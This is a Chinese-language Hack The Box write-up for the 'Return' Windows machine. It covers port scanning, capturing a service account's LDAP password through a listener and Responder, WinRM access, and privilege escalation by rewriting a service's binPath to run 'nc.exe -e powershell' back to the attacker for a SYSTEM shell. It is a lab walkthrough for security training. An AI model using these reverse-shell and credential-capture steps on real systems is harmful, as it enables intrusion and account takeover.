Return-htb-writeup

0x00 靶场技能介绍

章节技能:ldap、监听389端口、responder、用户特权组、Server Operators、sc.exe配置服务提权

参考链接:无参考链接,根据靶机介绍直接拿下

0x01 用户权限获取

1、靶机介绍

Return 是一款简单难度的 Windows 机器,具有存储 LDAP 凭据的网络打印机管理面板。这些凭据可以通过输入恶意 LDAP 服务器来捕获,该服务器允许通过 WinRM 服务在服务器上获得立足点。发现用户属于特权组的一部分,该特权组被进一步利用以获得系统访问权限。

2、获取下靶机IP地址:10.10.11.108

3、获取下开放端口情况:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.11.108
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-08 23:57 CST
Warning: 10.10.11.108 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.108
Host is up (0.12s latency).
Not shown: 64998 closed tcp ports (reset), 511 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49668/tcp open  unknown
49671/tcp open  unknown
49676/tcp open  unknown
49677/tcp open  unknown
49678/tcp open  unknown
49681/tcp open  unknown
49738/tcp open  unknown
64965/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 22.62 seconds
                                                                              
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49668,49671,49676,49677,49678,49681,49738,64965,                       

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap 10.10.11.108 --min-rate=10000 -p53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49668,49671,49676,49677,49678,49681,49738,64965 -sC -sV -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-08 23:59 CST
Nmap scan report for 10.10.11.108
Host is up (0.15s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: HTB Printer Admin Panel
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-08 08:14:13Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
49738/tcp open  msrpc         Microsoft Windows RPC
64965/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-05-08T08:15:11
|_  start_date: N/A
|_clock-skew: -7h45m42s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.56 seconds

4、先把上述探测到的域名地址本地绑定下hosts

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.108 printer.return.local return.local" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.108 printer.return.local return.local

5、先观察下80端口的WEB服务信息吧

http://10.10.11.108/index.php

http://10.10.11.108/settings.php

1
2
3
4
5
6
7
printer.return.local

389

svc-printer

*******

6、经过摸索,尝试通过nc去监听,让网页服务区连接我们的IP地址

1
2
3
4
5
6
┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 389
listening on [any] 389 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.108] 61852
0*`%return\svc-printer�
                       1edFg43012!!

7、这里获取到账号密码信息,下面尝试验证下是否可以正常登录

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!'
SMB         10.10.11.108    445    PRINTER          [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
SMB         10.10.11.108    445    PRINTER          [+] return.local\svc-printer:1edFg43012!!

8、这里发现密码是可以使用的,这次补充一下上面那个ldap密码明文的抓取步骤,这里使用responder工具进行监听抓取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo responder -I tun0      
[sudo] kali 的密码:
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [OFF]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.11]
    Responder IPv6             [dead:beef:2::1009]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-9UR2XUDZ85J]
    Responder Domain Name      [1GGZ.LOCAL]
    Responder DCE-RPC Port     [48986]

[+] Listening for events...                                                                                                                                                             

[LDAP] Cleartext Client   : 10.10.11.108
[LDAP] Cleartext Username : return\svc-printer
[LDAP] Cleartext Password : 1edFg43012!!

9、既然拿到账号密码了,就登录下靶机,获取第一个flag信息吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.108 -u svc-printer -p '1edFg43012!!'    
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-printer\Documents> ls
*Evil-WinRM* PS C:\Users\svc-printer\Documents> ls C:/Users


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/27/2021   4:40 AM                Administrator
d-r---        5/26/2021   1:50 AM                Public
d-----        5/26/2021   1:51 AM                svc-printer


*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ls


    Directory: C:\Users\svc-printer\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/7/2024   2:14 AM          59392 nc.exe
-ar---         5/6/2024   7:16 AM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cat user.txt
ff13eb37dc232a953a2d3615cb4918f6
*Evil-WinRM* PS C:\Users\svc-printer\Desktop>

0x02 系统权限获取

10、下面开始枚举,查看是否有可以发现的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled
SeSystemtimePrivilege         Change the system time              Enabled
SeBackupPrivilege             Back up files and directories       Enabled
SeRestorePrivilege            Restore files and directories       Enabled
SeShutdownPrivilege           Shut down the system                Enabled
SeChangeNotifyPrivilege       Bypass traverse checking            Enabled
SeRemoteShutdownPrivilege     Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set      Enabled
SeTimeZonePrivilege           Change the time zone                Enabled
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> net group

Group Accounts for \\

-------------------------------------------------------------------------------
*Cloneable Domain Controllers
*DnsUpdateProxy
*Domain Admins
*Domain Computers
*Domain Controllers
*Domain Guests
*Domain Users
*Enterprise Admins
*Enterprise Key Admins
*Enterprise Read-only Domain Controllers
*Group Policy Creator Owners
*Key Admins
*Protected Users
*Read-only Domain Controllers
*Schema Admins
The command completed with one or more errors.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> net user svc-printer
User name                    svc-printer
Full Name                    SVCPrinter
Comment                      Service Account for Printer
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            5/26/2021 1:15:13 AM
Password expires             Never
Password changeable          5/27/2021 1:15:13 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/8/2024 2:46:55 AM

Logon hours allowed          All

Local Group Memberships      *Print Operators      *Remote Management Use
                             *Server Operators
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop>

11、其实枚举到这里,我有注意到这两个特殊的组,一个是打印机操作组,一个是服务操作组,但是为了全面性,我就继续使用自动化枚举工具进行枚举了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> upload /home/kali/Desktop/tools/winPEASx64.exe .
                                        
Info: Uploading /home/kali/Desktop/tools/winPEASx64.exe to C:\Users\svc-printer\Desktop\.
                                        
Data: 3183272 bytes of 3183272 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ls


    Directory: C:\Users\svc-printer\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/7/2024   2:14 AM          59392 nc.exe
-ar---         5/6/2024   7:16 AM             34 user.txt
-a----         5/8/2024   8:08 PM        2387456 winPEASx64.exe


*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ./winPEASx64.exe

    Folder: C:\windows\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]
   =================================================================================================


    Folder: C:\windows\system32\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]

Found PHP_files Files
File: C:\inetpub\wwwroot\settings.php

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> cat C:\inetpub\wwwroot\settings.php
<?php
if($_SERVER["REQUEST_METHOD"]=="POST"){
  $ldap = ldap_connect($_POST["ip"]);
  $bind = ldap_bind($ldap, "return\svc-printer", "1edFg43012!!");
  if($bind){
    //
  }
}
?>

12、这里枚举的信息,知道了为啥会监听389端口就获取到了密码的情况。

13、下面,我有使用了SharpHound.exe和bloodhund去枚举关联分析,并没有什么特殊的发现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> upload /home/kali/Desktop/tools/SharpHound/SharpHound.exe 
                                        
Info: Uploading /home/kali/Desktop/tools/SharpHound/SharpHound.exe to C:\Users\svc-printer\Desktop\SharpHound.exe
                                        
Data: 1395368 bytes of 1395368 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc-printer\Desktop>


*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ls


    Directory: C:\Users\svc-printer\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/7/2024   2:14 AM          59392 nc.exe
-a----         5/8/2024   8:43 PM        1046528 SharpHound.exe
-ar---         5/6/2024   7:16 AM             34 user.txt
-a----         5/8/2024   8:08 PM        2387456 winPEASx64.exe


*Evil-WinRM* PS C:\Users\svc-printer\Desktop> 

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> .\SharpHound.exe --CollectionMethods All --Domain return.local
2024-05-08T20:55:59.8935815-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-05-08T20:55:59.9873326-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-05-08T20:56:00.0029701-07:00|INFORMATION|Initializing SharpHound at 8:56 PM on 5/8/2024
2024-05-08T20:56:02.6592161-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for return.local : printer.return.local
2024-05-08T20:56:02.9873405-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-05-08T20:56:03.0810808-07:00|INFORMATION|Beginning LDAP search for return.local
2024-05-08T20:56:03.0967151-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-05-08T20:56:03.0967151-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-05-08T20:56:33.6279605-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2024-05-08T20:56:49.3154554-07:00|INFORMATION|Consumers finished, closing output channel
2024-05-08T20:56:49.3310798-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-05-08T20:56:49.5029570-07:00|INFORMATION|Status: 90 objects finished (+90 1.956522)/s -- Using 42 MB RAM
2024-05-08T20:56:49.5029570-07:00|INFORMATION|Enumeration finished in 00:00:46.4239791
2024-05-08T20:56:49.5498315-07:00|INFORMATION|Saving cache with stats: 50 ID to type mappings.
 50 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-05-08T20:56:49.5498315-07:00|INFORMATION|SharpHound Enumeration Completed at 8:56 PM on 5/8/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> ls

    Directory: C:\Users\svc-printer\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/8/2024   8:56 PM          11221 20240508205649_BloodHound.zip
-a----         5/8/2024   8:56 PM           7540 M2Y3NjJjNWItMDZjMC00MTJkLWE1MDctODZhMmZhYmExM2Vh.bin
-a----         5/7/2024   2:14 AM          59392 nc.exe
-a----         5/8/2024   8:43 PM        1046528 SharpHound.exe
-ar---         5/6/2024   7:16 AM             34 user.txt
-a----         5/8/2024   8:08 PM        2387456 winPEASx64.exe


*Evil-WinRM* PS C:\Users\svc-printer\Desktop> 

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> download 20240508205649_BloodHound.zip
                                        
Info: Downloading C:\Users\svc-printer\Desktop\20240508205649_BloodHound.zip to 20240508205649_BloodHound.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\svc-printer\Desktop>

14、然后就继续回到一开始发现的2个用户组上面了,开始研究

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
*Evil-WinRM* PS C:\Users\svc-printer\Documents> net localgroup "Print Operators"
Alias name     Print Operators
Comment        Members can administer printers installed on domain controllers

Members

-------------------------------------------------------------------------------
svc-printer
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-printer\Documents> net localgroup "Server Operators"
Alias name     Server Operators
Comment        Members can administer domain servers

Members

-------------------------------------------------------------------------------
svc-printer
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-printer\Documents>

15、这里发现我们在 Server Operators 组的权限非常大的,下面开始研究如何利用吧

https://book.hacktricks.xyz/v/cn/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#yu-kong-zhi-qi-fang-wen

1
2
3
4
5
6
7
8
域控制器访问
除非用户是Server Operators组的成员,否则对DC上的文件的访问是受限的,这会改变访问级别。

特权升级
使用Sysinternals的PsService或sc,可以检查和修改服务权限。例如,Server Operators组对某些服务拥有完全控制权,允许执行任意命令和特权升级:

C:\> .\PsService.exe security AppReadiness
这个命令显示Server Operators具有完全访问权限,可以操纵服务以获取提升的特权。

16、继续在互联网上寻找可以突破权限的文章

1
Server Operators:他们可以在域服务器上执行维护任务。

https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/

17、上面的文章中有给出利用方法的步骤,直接按步骤开始利用吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> services

Path                                                                                                                 Privileges Service          
----                                                                                                                 ---------- -------          
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe                                                                  True ADWS             
\??\C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{5533AFC7-64B3-4F6E-B453-E35320B35716}\MpKslDrv.sys       True MpKslceeb2796    
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe                                                              True NetTcpPortSharing
C:\Windows\SysWow64\perfhost.exe                                                                                           True PerfHost         
"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"                                                False Sense            
C:\Windows\servicing\TrustedInstaller.exe                                                                                 False TrustedInstaller 
"C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe"                                                     True VGAuthService    
C:\Users\svc-printer\Desktop\nc.exe -e cmd.exe 10.10.16.27 4444                                                            True VMTools          
C:\programdata\nc.exe -e cmd 10.10.16.27 4444                                                                              True VSS              
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\NisSrv.exe"                                             True WdNisSvc         
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2104.14-0\MsMpEng.exe"                                            True WinDefend        
"C:\Program Files\Windows Media Player\wmpnetwk.exe"                                                                      False WMPNetworkSvc    

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> 

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc.exe config VMTools binPath="C:\Users\svc-printer\Desktop\nc.exe -e powershell 10.10.14.11 443"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc.exe stop VMTools
[SC] ControlService FAILED 1062:

The service has not been started.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop> sc.exe start VMTools
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

*Evil-WinRM* PS C:\Users\svc-printer\Desktop>

18、获取到监听的shell,并直接去读最终的flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.108] 54449
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> cd C:/Users
cd C:/Users
PS C:\Users> ls
ls


    Directory: C:\Users


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        9/27/2021   4:40 AM                Administrator                                                         
d-r---        5/26/2021   1:50 AM                Public                                                                
d-----        5/26/2021   1:51 AM                svc-printer                                                           


PS C:\Users> cd Administrator
cd Administrator
PS C:\Users\Administrator> cd Desktop
cd Desktop
PS C:\Users\Administrator\Desktop> ls
ls


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---         5/6/2024   7:16 AM             34 root.txt                                                              


PS C:\Users\Administrator\Desktop>
PS C:\Users\Administrator\Desktop> type C:/Users/Administrator/Desktop/root.txt
type C:/Users/Administrator/Desktop/root.txt
3c61314a046c2f14c1bcce2a663a75f9
PS C:\Windows\system32>

19、这里其实这个服务器的反弹的shell,比较不稳定,但是给的时间还是可以拿到最终的flag的

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/401

打靶记
#shooting-range
Return-htb-writeup
https://sh1yan.top/2024/05/08/Return-htb-writeup/
作者
shiyan
发布于
2024年5月8日
许可协议